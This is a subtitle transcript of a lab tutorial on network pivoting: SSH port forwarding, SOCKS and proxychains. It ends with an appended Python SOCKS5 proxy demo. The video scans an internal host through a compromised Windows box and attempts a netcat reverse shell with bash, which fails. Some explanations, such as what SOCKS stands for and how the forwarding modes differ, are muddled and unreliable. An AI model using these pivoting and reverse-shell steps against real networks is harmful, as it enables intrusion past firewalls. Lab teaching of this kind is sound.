1
00:00:00,810 --> 00:00:06,510
So in this video we will be discussing pivoting. We will also discuss a few

2
00:00:06,510 --> 00:00:09,730
basics, that is, SSH tunneling and SOCKS.

3
00:00:09,750 --> 00:00:11,930
And then we will discuss proxychains.

4
00:00:12,150 --> 00:00:14,910
So first, this is the scenario we have.

5
00:00:14,940 --> 00:00:19,160
This is the attacker box, and it has the IP address 192.168.0.10.

6
00:00:19,650 --> 00:00:22,850
OK, as we saw in the session before.

7
00:00:23,460 --> 00:00:29,060
So this IP address is the attacker's, and this is the Windows 7 box.

8
00:00:29,100 --> 00:00:32,240
So this is also having a /24 subnet.

9
00:00:32,480 --> 00:00:34,580
OK, so 250 are available.

10
00:00:35,010 --> 00:00:36,660
This is .20.

11
00:00:36,660 --> 00:00:38,400
And this is... OK, that's fine.

12
00:00:38,430 --> 00:00:44,610
So we have the connection from this attacker box to the Windows box, so you can ping from this box to this

13
00:00:44,610 --> 00:00:46,950
box, and from this one to the Windows 7.

14
00:00:47,040 --> 00:00:59,090
Now, second, there is another network adapter, and that contains the 126 range, the IP 192.168.126.0

15
00:00:59,130 --> 00:01:00,580
slash 24.

16
00:01:00,840 --> 00:01:07,580
So this has another adapter, and it is connected to this other network.

17
00:01:08,520 --> 00:01:15,300
And here there is another machine, that is Metasploitable, and this has the IP address

18
00:01:15,300 --> 00:01:17,220
.54.

19
00:01:19,020 --> 00:01:26,440
So suppose you have compromised this Windows 7 machine and got the reverse shell, so you can just

20
00:01:26,760 --> 00:01:28,220
think that this is over.

21
00:01:28,230 --> 00:01:29,190
But it's not.

22
00:01:29,550 --> 00:01:37,650
If you want to pivot into this internal infrastructure, you need to see what other adapters

23
00:01:37,650 --> 00:01:39,100
this computer is having.

24
00:01:39,390 --> 00:01:43,010
So it has another network adapter that is connected to this network.

25
00:01:43,170 --> 00:01:47,300
So that means there may be some more machines in this subnet.

26
00:01:47,670 --> 00:01:52,480
So with this machine, you need to scan the entire subnet for live hosts.

27
00:01:52,770 --> 00:01:57,350
And after scanning, what you get is this list of IP addresses.

28
00:01:57,870 --> 00:01:59,570
So you get the .54.

29
00:01:59,640 --> 00:02:02,120
So one more computer is the .54.

30
00:02:02,250 --> 00:02:09,210
So that means this Windows 7, with this adapter, has been connected to the network, and this Metasploitable

31
00:02:09,570 --> 00:02:11,370
is also connected to this network.

32
00:02:11,490 --> 00:02:14,250
So that means this machine can ping this machine.

33
00:02:15,540 --> 00:02:23,850
OK, so only by compromising this machine can you perform the scans and attacks on this

34
00:02:23,850 --> 00:02:26,460
Metasploitable. Without compromising this one,

35
00:02:26,470 --> 00:02:32,010
you cannot, actually. Let me try this.

36
00:02:33,550 --> 00:02:40,560
So without compromising this one, if you want to try to ping this, you will not be able to,

37
00:02:40,560 --> 00:02:52,650
because there is no route to this IP address, because its subnet is a different

38
00:02:52,670 --> 00:02:53,510
one.

39
00:02:53,760 --> 00:02:56,670
So in Metasploit, as we will see in an upcoming video,

40
00:02:56,670 --> 00:03:01,500
we can add routes via this box, the Windows 7 box.

41
00:03:01,620 --> 00:03:07,670
So we will be adding the route to this whole subnet, 192.168.126.0/24,

42
00:03:07,920 --> 00:03:08,460
via this.

43
00:03:09,030 --> 00:03:12,180
So then you can ping this from the attacker box.

44
00:03:13,380 --> 00:03:15,390
So that's how you do it.

45
00:03:15,980 --> 00:03:19,170
But today we will be discussing about SSH.

46
00:03:19,930 --> 00:03:21,660
Now think of this as a scenario.

47
00:03:24,090 --> 00:03:25,790
OK.

48
00:03:25,980 --> 00:03:33,950
So this is nothing but: it creates a tunnel between this machine and this machine.

49
00:03:34,260 --> 00:03:39,900
So this securely transfers the data from this box to this box.

50
00:03:40,110 --> 00:03:45,060
So this will be very helpful when you have a server, but you don't have a certificate.

51
00:03:45,300 --> 00:03:53,010
So in that case, if any user wants to log in, you can just create this SSH tunnel and

52
00:03:53,010 --> 00:03:54,970
then you can send the credentials in the tunnel.

53
00:03:54,990 --> 00:03:56,640
So it will be very safe.

54
00:03:57,930 --> 00:04:01,170
So that's what I want to discuss about SOCKS.

55
00:04:02,390 --> 00:04:04,760
SOCKS stands for Secure Socket.

56
00:04:05,430 --> 00:04:13,050
So it is a protocol that supports this secure tunnel, and it has version 4

57
00:04:14,760 --> 00:04:15,900
and version 5.

58
00:04:16,140 --> 00:04:18,080
So this version is very secure.

59
00:04:18,090 --> 00:04:23,860
You can set, you know, the password to get access, so that is another advantage.

60
00:04:23,940 --> 00:04:29,150
So you can just spin up the tunnel and you can send the data, OK?

61
00:04:29,250 --> 00:04:34,170
Now, what we're going to discuss is three types of port forwarding.

62
00:04:34,620 --> 00:04:35,080
OK.

63
00:04:35,250 --> 00:04:37,280
One is the local port forwarding.

64
00:04:37,840 --> 00:04:44,700
Suppose this machine is trying to access the web server on the Windows box.

65
00:04:44,890 --> 00:04:45,810
So generally...

66
00:04:48,320 --> 00:04:53,440
It will... it will...

67
00:04:55,600 --> 00:05:04,750
It will stop the login attempt from this box, because maybe this port is filtered by some firewall

68
00:05:04,840 --> 00:05:06,020
in the middle of this.

69
00:05:07,480 --> 00:05:14,070
So if I'm trying to connect on port 80, maybe it's blocking the port 80.

70
00:05:14,170 --> 00:05:15,070
This is a firewall.

71
00:05:15,280 --> 00:05:25,820
So now, what I can do is I can use this SSH to create a local port, that is, say,

72
00:05:25,890 --> 00:05:26,270
2222.

73
00:05:26,590 --> 00:05:32,860
So this is a local port, and I want to local port forward to this Windows 7 box.

74
00:05:33,370 --> 00:05:43,660
So whenever I do that, then I can send the web page credentials normally to this port of mine, this

75
00:05:43,660 --> 00:05:45,070
IP address and this port.

76
00:05:45,190 --> 00:05:51,670
So then this SSH would automatically send this packet to this port 80.

77
00:05:52,030 --> 00:05:56,830
So that's one way to bypass these firewalls.

78
00:05:58,150 --> 00:06:00,760
So you need to first log into the machine.

79
00:06:00,760 --> 00:06:03,760
So you need to get the credentials.

80
00:06:06,160 --> 00:06:12,940
So this will be very useful in the cloud, because the firewalls continuously block the

81
00:06:12,940 --> 00:06:19,420
traffic, because no one from the public should access this SSH server or web server or any other service.

82
00:06:19,430 --> 00:06:24,950
So that's why this is very helpful when connecting to the VM in the cloud.

83
00:06:25,900 --> 00:06:28,270
So this is local port forwarding.

84
00:06:28,360 --> 00:06:37,230
So there will be some random port number on our machine that will be connected to any machine, any other

85
00:06:37,230 --> 00:06:38,050
remote machine.

86
00:06:38,350 --> 00:06:44,710
And whatever packet we send to this port, it will be forwarded to this remote machine.

87
00:06:44,740 --> 00:06:53,940
So that is the local port forwarding, and it is quite simple. And the next one is dynamic port forwarding.

88
00:06:55,450 --> 00:07:00,200
So the difference between local and dynamic is that multiple ports are possible.

89
00:07:00,550 --> 00:07:07,890
So in the local port forwarding, you can forward the packets coming to this 2222,

90
00:07:07,930 --> 00:07:16,750
one port, so you can transfer the packets from 2222 to 80 of

91
00:07:16,760 --> 00:07:17,460
the Windows 7.

92
00:07:18,730 --> 00:07:23,970
So only one port to one port, that is the local port forwarding. So in dynamic port forwarding,

93
00:07:24,100 --> 00:07:30,540
what you need to do is, you can say 2222 to star.

94
00:07:31,450 --> 00:07:39,700
So that means you can send the packets to any port on the Windows 7.

95
00:07:39,700 --> 00:07:47,590
So by setting this you can scan the web server, you can scan the ports, or you can do anything you want, but

96
00:07:47,590 --> 00:07:52,180
it only applies to the TCP, but you cannot scan the UDP ports.

97
00:07:53,770 --> 00:07:56,260
So that is the dynamic port forwarding.

98
00:07:56,290 --> 00:08:03,760
The only difference is you can port forward the packets from our machine to any other TCP port in the

99
00:08:03,760 --> 00:08:04,420
dynamic port forwarding.

100
00:08:04,990 --> 00:08:06,640
So these are almost equal.

101
00:08:08,710 --> 00:08:19,700
But the difference is in the number of ports we can forward. So the next one is remote port forwarding,

102
00:08:20,170 --> 00:08:21,490
so remote port

103
00:08:21,490 --> 00:08:24,610
forwarding is opposite to the local port forwarding.

104
00:08:24,940 --> 00:08:28,000
So suppose this is the Windows 7 box, OK?

105
00:08:28,480 --> 00:08:31,150
And on the attacker machine, I am running a web server.

106
00:08:32,710 --> 00:08:37,170
So normally, think of this as a client machine.

107
00:08:37,180 --> 00:08:39,040
So I want to connect to this web server.

108
00:08:41,340 --> 00:08:51,070
So I want to connect to this web server. And now, whenever a client is connecting, suppose

109
00:08:51,130 --> 00:08:56,970
this is the client, and it is connected to the attacker machine for the web server, and

110
00:08:57,240 --> 00:09:01,050
then, when connecting, it can obtain the IP address of this attacker machine.

111
00:09:01,140 --> 00:09:03,030
So 192.168.0.2.

112
00:09:03,210 --> 00:09:06,660
So this is my IP, and it can be seen by this.

113
00:09:07,380 --> 00:09:09,880
So this can be another attacker.

114
00:09:10,140 --> 00:09:17,190
So if they know the IP address, they can scan, and they can find the vulnerabilities.

115
00:09:17,520 --> 00:09:26,160
So in order to hide my IP address, now what I can do is I can set remote port forwarding to this

116
00:09:26,160 --> 00:09:32,520
machine right here, to this machine's port number 80.

117
00:09:33,930 --> 00:09:36,250
So this is remote port forwarding.

118
00:09:36,330 --> 00:09:43,380
So that means instead of sending this packet to this attacker, the packet should be sent to this

119
00:09:44,860 --> 00:09:46,670
box, the Windows 7 box.

120
00:09:46,990 --> 00:09:55,140
OK, so whatever packet arrives at this Windows 7 box at port 80, then it will be

121
00:09:55,150 --> 00:09:58,840
automatically transferred to this, our attacker machine.

122
00:09:59,410 --> 00:10:06,280
So what this will do is, it will take this IP address, colon 80, in the browser, and this packet will

123
00:10:06,280 --> 00:10:11,180
be forwarded to this port, and then it will send the packets again to this.

124
00:10:11,530 --> 00:10:17,670
So that means your IP address is being hidden from the Metasploitable.

125
00:10:17,860 --> 00:10:19,810
So all they need to know is this.

126
00:10:19,810 --> 00:10:28,900
I told you, this Metasploitable can never know the IP address unless they compromise this

127
00:10:28,900 --> 00:10:29,220
machine.

128
00:10:29,230 --> 00:10:37,990
So otherwise it will be very safe. So this is very helpful in hiding the IP address,

129
00:10:37,990 --> 00:10:40,450
and proxies and firewalls, et cetera.

130
00:10:40,840 --> 00:10:42,790
So these are the basics of SSH tunneling.

131
00:10:46,280 --> 00:10:46,870
So again.

132
00:10:51,150 --> 00:11:00,420
Now, what we need to do is, we set the dynamic port forwarding from this attacker box to this

133
00:11:00,420 --> 00:11:06,710
Windows 7 box, so using proxychains we will then be able to scan this machine.

134
00:11:07,110 --> 00:11:08,500
So let's go and do that.

135
00:11:08,730 --> 00:11:10,380
So my current setup.

136
00:11:14,060 --> 00:11:22,700
So if you want to set up the environment, go to your virtual machine manager, so you can see three VMs:

137
00:11:22,730 --> 00:11:27,120
one is Kali, the next one, and so on; it can be any three.

138
00:11:27,350 --> 00:11:27,800
So.

139
00:11:27,800 --> 00:11:28,820
Right-click on this.

140
00:11:29,930 --> 00:11:30,860
Go to Settings.

141
00:11:32,530 --> 00:11:38,450
So you can see the adapter here. OK, that's fine.

142
00:11:38,740 --> 00:11:45,400
I have the IP address; ifconfig, so I have the IP address, 192.168.0.2.

143
00:11:45,480 --> 00:11:50,020
The next one is the Windows 7 box; right-click, Settings.

144
00:11:51,400 --> 00:12:00,320
And here I have one adapter that is connected to my router, and also I have another adapter that is a custom VMnet.

145
00:12:00,760 --> 00:12:02,980
So you can choose any of these except this NAT.

146
00:12:03,430 --> 00:12:07,300
So VMnet1, and then...

147
00:12:11,010 --> 00:12:18,600
In this third machine, I also have the VMnet1, so that means the Windows 7 box and this Metasploitable

148
00:12:18,680 --> 00:12:20,640
are connected to one network.

149
00:12:20,790 --> 00:12:23,990
So that means these can communicate with each other.

150
00:12:24,000 --> 00:12:27,000
But these cannot. So let's power on.

151
00:12:58,680 --> 00:12:59,020
OK.

152
00:12:59,040 --> 00:13:03,720
Meanwhile, here is my IP address.

153
00:13:07,490 --> 00:13:10,040
So let me show you the proxychains.

154
00:13:16,510 --> 00:13:23,860
So it's in /etc, the proxychains configuration; edit that configuration and enter the password.

155
00:13:26,720 --> 00:13:30,140
And if you go down, so in the chain...

156
00:13:47,650 --> 00:13:52,880
So you can add the proxy here, so socks4 127.0.0.1 9050.

157
00:13:53,170 --> 00:13:59,100
So this will set up a SOCKS4 server on this 9050 port.

158
00:13:59,770 --> 00:14:08,540
OK, now you can direct traffic to this port, and this will be a SOCKS proxy.

159
00:14:08,580 --> 00:14:12,820
This will forward the traffic from here to the machine you want to forward to.

160
00:14:13,750 --> 00:14:21,580
So already the 9050 port is working. So log in to my Windows box.

161
00:14:26,030 --> 00:14:28,040
And also in Metasploitable.

162
00:14:36,210 --> 00:14:45,010
So if you type ifconfig, you can see I have one, and that is the 126 one, right.

163
00:14:45,780 --> 00:14:48,810
So now let's go to my Windows box.

164
00:15:02,620 --> 00:15:09,310
So, OK, open cmd, so type ipconfig.

165
00:15:12,060 --> 00:15:19,320
So you can see I have one adapter that is connected to my router, .103, and also you can see

166
00:15:19,320 --> 00:15:22,070
another one, this .128.

167
00:15:22,200 --> 00:15:24,980
So that means I can ping this one.

168
00:15:29,000 --> 00:15:34,850
So we're going to ping this Metasploitable and hit enter, and again see the ping replies back.

169
00:15:36,390 --> 00:15:40,020
So let's try to ping, from this one, the Metasploitable.

170
00:15:44,630 --> 00:15:46,700
So you cannot ping, because there is no route.

171
00:15:48,140 --> 00:15:54,710
So, again, now, what we need to do is: I have installed this OpenSSH, so you can download and

172
00:15:54,710 --> 00:16:04,390
install it normally. In any company, the computers have SSH normally running.

173
00:16:05,030 --> 00:16:15,560
So that's why I can say ssh, the switch -D for dynamic port forwarding, and use the port

174
00:16:15,560 --> 00:16:16,880
9050, which is already

175
00:16:19,670 --> 00:16:20,450
running.

176
00:16:20,450 --> 00:16:21,700
The server is running.

177
00:16:21,710 --> 00:16:24,290
So I'm typing the IP address.

178
00:16:27,010 --> 00:16:32,290
So username at IP address, hit enter, and type in the password.

179
00:16:35,230 --> 00:16:44,740
So you can see we have successfully logged in. Now open a new terminal, so you can go to the web browser,

180
00:16:46,270 --> 00:16:49,300
and now the port, it is open.

181
00:16:49,300 --> 00:16:50,050
So that's it.

182
00:16:53,180 --> 00:16:54,680
Let's open the web browser.

183
00:17:01,190 --> 00:17:05,690
So go to the Settings, Preferences.

184
00:17:08,240 --> 00:17:08,900
Proxy.

185
00:17:12,820 --> 00:17:23,470
And choose the manual, and SOCKS host, that is our localhost, and port number here, 9050. Make

186
00:17:23,470 --> 00:17:29,000
sure that it is SOCKS v5, otherwise it will ask for username, password and...

187
00:17:29,110 --> 00:17:29,410
OK.

188
00:17:29,580 --> 00:17:36,280
OK, now I need to... you can go to this website, the one

189
00:17:40,640 --> 00:17:50,630
on this Metasploitable. Now you can tell, so you can see now we can access this, because we have redirected

190
00:17:50,630 --> 00:17:56,600
our whole traffic to the proxy, and it redirects the traffic to this Windows 7 box.

191
00:17:57,030 --> 00:17:58,590
So this Windows 7 box,

192
00:17:59,510 --> 00:18:01,300
of course, can connect to this Metasploitable.

193
00:18:02,180 --> 00:18:06,320
So that's why we have the connection through this SSH session.

194
00:18:06,800 --> 00:18:08,740
That's why we got the results.

195
00:18:09,590 --> 00:18:12,310
And if you want, you can remove this one.

196
00:18:13,490 --> 00:18:22,010
So this is one important method: to set the proxy. And if you set no proxy and click on OK, and do all of this,

197
00:18:22,010 --> 00:18:24,290
you will not get the result.

198
00:18:26,780 --> 00:18:29,930
Because you can use the proxychains command.

199
00:18:32,630 --> 00:18:41,450
So proxychains command, and you can say firefox and the IP address, so it will open this page in this

200
00:18:41,450 --> 00:18:45,170
Firefox, and that will be routed through the proxychains.

201
00:18:50,080 --> 00:18:59,320
And now you can see. No matter what you do, you can see here there is a status, and you can see the

202
00:18:59,320 --> 00:19:04,360
traffic is going from this 9050 to the port 80 of the

203
00:19:04,510 --> 00:19:04,600
Metasploitable.

204
00:19:06,610 --> 00:19:09,730
OK, so now you can Ctrl+C.

205
00:19:10,270 --> 00:19:11,770
And also you can

206
00:19:14,730 --> 00:19:15,840
do the scan.

207
00:19:23,200 --> 00:19:31,420
And you can test, for example, for 21, maybe 22, and the IP address.

208
00:19:41,940 --> 00:19:48,810
You can see it has successfully scanned the ports, and you can also do the version scan, take something,

209
00:19:49,170 --> 00:19:51,820
so you can do that, and maybe scan using this proxychains.

210
00:19:52,020 --> 00:19:57,810
So this is one method of pivoting into the infrastructure, using proxychains.

211
00:19:57,870 --> 00:20:00,150
OK, now let's close this.

212
00:20:01,950 --> 00:20:06,660
And I want to show you the remote port forwarding. So this is

213
00:20:06,660 --> 00:20:07,170
ssh

214
00:20:09,630 --> 00:20:19,170
-R, capital R. So you need to specify our IP address, sorry, this Windows 7's IP address here.

215
00:20:21,550 --> 00:20:25,930
This is this one, 192.168.126.128.

216
00:20:32,030 --> 00:20:46,360
Colon, and you need this, the port number, 6666, colon, and specify our IP address, that is

217
00:20:46,820 --> 00:20:49,740
localhost colon 1234.

218
00:20:49,940 --> 00:20:59,240
So what this means: I am forwarding this IP address and this port. So suppose some traffic

219
00:20:59,240 --> 00:21:06,710
is being sent to this exact port of this remote machine, then the traffic will be redirected to my

220
00:21:07,100 --> 00:21:09,180
localhost at the 1234.

221
00:21:09,320 --> 00:21:17,090
It's similar to this remote forwarding from Metasploitable to the attacker, that of the web server.

222
00:21:17,360 --> 00:21:17,970
Similar one.

223
00:21:18,110 --> 00:21:20,720
But this is the remote one.

224
00:21:21,230 --> 00:21:23,420
So let's log in to the Windows machine.

225
00:21:30,350 --> 00:21:32,080
And now type the password.

226
00:21:34,300 --> 00:21:44,620
So we are successfully logged in. So you can set up the listener, so on the port we have given, nc -lvp

227
00:21:44,620 --> 00:21:48,400
1234, 1234.

228
00:21:48,570 --> 00:21:51,420
And so we are listening on the port.

229
00:21:51,430 --> 00:21:59,040
So now, on Metasploitable, I will create the reverse shell, nc, and the IP address

230
00:21:59,050 --> 00:22:10,210
I specify is this Windows 7 box, .128, and the port number 6666, because if you send the data, this traffic, to

231
00:22:10,210 --> 00:22:15,100
this port, then you will get this traffic at 1234.

232
00:22:15,670 --> 00:22:17,860
OK, nc 192.168.126.

233
00:22:21,580 -->00:22:32,890
128 6666, and upon execution... so I'm going to execute this with bash and hit enter.

234
00:22:36,640 --> 00:22:39,070
So you have got "connection refused".

235
00:22:54,990 --> 00:22:59,280
So let me check everything.

236
00:23:23,870 --> 00:23:26,570
OK, now let's see this.

237
00:23:30,220 --> 00:23:34,210
So the 127.0.0.1, that is what we are setting.

238
00:23:45,600 --> 00:23:46,890
And now hit enter.

239
00:23:53,930 --> 00:23:55,450
We are listening on 1234.

240
00:23:57,680 --> 00:23:59,750
So let's execute this.

241
00:24:05,420 --> 00:24:05,760
OK.

242
00:24:05,810 --> 00:24:08,460
I don't know why we are getting this connection

243
00:24:08,490 --> 00:24:09,140
refused.

244
00:24:11,500 --> 00:24:13,080
So everything seems fine.

245
00:24:21,810 --> 00:24:30,680
OK, OK, let's give it a try once. Proxychains is set up, I executed it again, and I am opening

246
00:24:30,880 --> 00:24:35,390
again the website in a web browser.

247
00:24:35,400 --> 00:24:38,990
So I don't know why this nc is failing.

248
00:24:39,300 --> 00:24:41,200
So you guys can give it a try.

249
00:24:41,340 --> 00:24:43,630
So that's all for this video.

250
00:24:43,920 --> 00:24:46,400
I'll be looking into this later.

251
00:24:46,420 --> 00:24:49,490
So, actually, awesome; see you in the next one.
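
Added example, not part of the video or its subtitles: a minimal SOCKS5 (RFC 1928) CONNECT proxy and the client-side handshake, in Python, on loopback only. It illustrates the SOCKS basics (cues 54 to 60) and the dynamic-forward plus proxychains demo (cues 132 to 210): the server plays the part of the listener that `ssh -D 9050` opens on the attacker box, `socks5_connect()` does what proxychains does to every connect() it intercepts, and a loopback echo service stands in for the web server on the Metasploitable host. Assumptions: no authentication method, IPv4 targets only, and every address and port is an ephemeral loopback one chosen at run time rather than the 9050 and 192.168.126.x values from the video. `port_is_open()` is why an nmap connect scan through proxychains works and why it is TCP-only: the proxy answers REP 0x00 when the pivot host could connect and 0x05 when the target refused, and there is no such exchange for UDP.

```python
# Added example, not from the video: SOCKS5 CONNECT proxy (the role of the `ssh -D`
# listener) plus the client handshake proxychains performs. Loopback, no auth, IPv4.
import contextlib
import socket
import struct
import threading

VER, NO_AUTH, CMD_CONNECT, ATYP_IPV4 = 0x05, 0x00, 0x01, 0x01
REP_OK, REP_REFUSED, REP_BAD_CMD, REP_BAD_ATYP = 0x00, 0x05, 0x07, 0x08

def _recv_exact(sock, n):  # SOCKS fields are fixed-size, so a short read is an error
    buf = sock.recv(n, socket.MSG_WAITALL)
    if len(buf) != n:
        raise ConnectionError("peer closed mid-handshake")
    return buf

def _pump(src, dst):  # copy src -> dst until EOF, then half-close dst so it sees EOF too
    with contextlib.suppress(OSError):
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    with contextlib.suppress(OSError):
        dst.shutdown(socket.SHUT_WR)

def _reply(client, rep, addr="0.0.0.0", port=0):  # VER REP RSV ATYP BND.ADDR BND.PORT
    client.sendall(bytes([VER, rep, 0, ATYP_IPV4]) + socket.inet_aton(addr) + struct.pack("!H", port))

def _serve_socks_client(client):  # server side: method negotiation, CONNECT, two-way relay
    with client:
        ver, nmethods = _recv_exact(client, 2)
        if ver != VER or NO_AUTH not in _recv_exact(client, nmethods):
            return client.sendall(bytes([VER, 0xFF]))  # no acceptable method, hang up
        client.sendall(bytes([VER, NO_AUTH]))
        _ver, cmd, _rsv, atyp = _recv_exact(client, 4)
        host = socket.inet_ntoa(_recv_exact(client, 4))  # DST.ADDR, IPv4 only here
        port = struct.unpack("!H", _recv_exact(client, 2))[0]
        if atyp != ATYP_IPV4 or cmd != CMD_CONNECT:
            return _reply(client, REP_BAD_ATYP if atyp != ATYP_IPV4 else REP_BAD_CMD)
        try:  # the proxy host, not the client, opens the connection to the target
            upstream = socket.create_connection((host, port))
        except OSError:  # refused: exactly what a connect scan through the pivot sees
            return _reply(client, REP_REFUSED)
        with upstream:
            _reply(client, REP_OK, *upstream.getsockname()[:2])
            t = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
            t.start()
            _pump(client, upstream)
            t.join()

def _listen(handler):  # ephemeral loopback listener, one thread per connection
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen()
    def loop():
        with contextlib.suppress(OSError):  # ends when demo() closes the listener
            while True:
                threading.Thread(target=handler, args=(srv.accept()[0],), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv, srv.getsockname()[1]

def _echo(conn):  # stand-in for the service on the internal subnet: echo until EOF
    with conn:
        _pump(conn, conn)

def socks5_connect(proxy, target):  # client side; returns a socket whose bytes reach target
    s = socket.create_connection(proxy, timeout=5)
    try:
        s.sendall(bytes([VER, 1, NO_AUTH]))  # one method offered: no authentication
        if _recv_exact(s, 2) != bytes([VER, NO_AUTH]):
            raise ConnectionError("proxy rejected the no-auth method")
        s.sendall(bytes([VER, CMD_CONNECT, 0, ATYP_IPV4]) + socket.inet_aton(target[0]) + struct.pack("!H", target[1]))
        rep = _recv_exact(s, 10)[1]  # VER REP RSV ATYP BND.ADDR BND.PORT (IPv4 reply is 10 bytes)
        if rep != REP_OK:
            raise ConnectionError(f"CONNECT refused by proxy, REP={rep:#04x}")
    except BaseException:
        s.close()
        raise
    return s

def port_is_open(proxy, target):  # TCP connect scan via the pivot: REP_OK open, else closed
    try:
        socks5_connect(proxy, target).close()
        return True
    except ConnectionError:
        return False

def demo(payload=b"GET / HTTP/1.0\r\n\r\n"):  # tunnel payload to the echo target, then probe
    target, target_port = _listen(_echo)
    socks, socks_port = _listen(_serve_socks_client)
    with socket.socket() as spare:  # bind and release a port: nothing listens there afterwards
        spare.bind(("127.0.0.1", 0))
        closed_port = spare.getsockname()[1]
    try:
        with socks5_connect(("127.0.0.1", socks_port), ("127.0.0.1", target_port)) as s:
            s.sendall(payload)
            s.shutdown(socket.SHUT_WR)
            echoed = b"".join(iter(lambda: s.recv(4096), b""))
        return {"echoed": echoed,
                "open": port_is_open(("127.0.0.1", socks_port), ("127.0.0.1", target_port)),
                "closed": port_is_open(("127.0.0.1", socks_port), ("127.0.0.1", closed_port))}
    finally:
        socks.close()
        target.close()
```

`demo()` returns the bytes that came back through the tunnel together with the two probe results; swapping `_listen(_echo)` for a real service and the loopback proxy for `127.0.0.1:9050` after `ssh -D 9050 user@pivot` is the video's setup, with proxychains doing the `socks5_connect` step for unmodified tools such as firefox or nmap.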